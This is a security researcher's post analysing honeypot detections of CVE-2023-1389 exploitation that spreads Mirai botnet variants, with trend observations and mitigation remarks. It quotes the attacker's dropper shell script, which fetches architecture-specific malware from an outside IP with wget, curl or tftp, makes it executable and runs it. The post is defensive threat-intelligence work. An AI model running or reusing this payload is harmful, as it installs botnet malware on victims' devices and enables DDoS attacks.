Prophetic Post by Intern on CVE-2023-1389 Foreshadows Mirai Botnet Expansion Today
Last week, Jonah Latimer posted here about traffic he saw to his own EC2 web honeypot exploiting CVE-2023-1389. I found this looking at new URL strings to our honepot network, and so for on 29 Nov 23, there have been about 300 detections for this vulnerability pulling a shell script from 45.95.146.26 a quick little shell script that does little more than figure out the architecture of the victim device and then attempt to download a architecture-specific variant of Mirai.
server_ip="45.95.146.26"\
binout="system"
exec="your device just got infected to a bootnoot"
do
rm -rf $arch
cd /tmp || cd /var || cd /dev; wget http://$server_ip/g/$arch -O $binout || curl -O $binout http://$server_ip/g/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=`./$binout $1`
if [ "$status" = "$exec" ]; then
break
rm -rf $binout
done
The same IP hosted those binaries which were first seen on Virustotal on 24 November 2023 (See the ARM version report on VT here).
If you take a look at our own data and generalize the exploit (example here) you see one spike in August and roughly small "noise level" exploitation and then today which so far has surpassed all our previous observation of exploit activity.
The mitigation advice is the same, these devices probably shouldn't have internet facing admin panels but unfortunately the class of device suggests the people running them are also not likely reading such guidance much less have the ability or wherewithall to fix the issue and/or update their firmware.
It should be pointed out that in the current environment of heightened geopolitical activity, DDoS is often the first lever used by individuals who want to project that same conflict online which makes the expansion of Mirai that much more concerning.
--
John Bambenek
bambenek \at\ gmail /dot/ com
Bambenek Labs - Well Fed Intelligence
Comments